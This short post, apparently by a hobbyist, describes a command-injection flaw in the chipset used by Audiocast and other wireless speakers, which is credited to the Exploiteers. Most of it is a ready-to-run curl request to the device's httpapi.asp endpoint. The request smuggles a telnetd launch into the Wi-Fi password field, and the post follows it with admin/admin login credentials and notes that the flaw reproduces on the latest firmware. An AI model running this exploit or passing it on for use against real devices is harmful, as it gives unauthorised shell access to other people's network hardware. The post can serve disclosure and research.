Folks from Exploiteers teams have found a flaw in the chipset powering the Audiocast (as well as a high number of other wireless speakers).
This hack is described here and consists of calling the web API with a malicious command injecting a call to telnetd.
curl 'http://192.168.1.10/httpapi.asp' -H 'CONTENT-TYPE: application/x-www-form-urlencoded' -H 'Accept: */*' -H 'Cache-Control: no-cache' -H 'Connection: keep-alive' -H 'If-Modified-Since: 0, 0' --data 'command=wlanConnectApEx:ssid=636A32:ch=1:auth=WPA2PSK:encry=AES:pwd=3132333435363738;/usr/sbin/telnetd;:chext=0' --compressed
Once telnet is started, wait a couple seconds and login with admin/admin credentials.
I have reproduced this on my Audiocast flashed with latest firmware to date.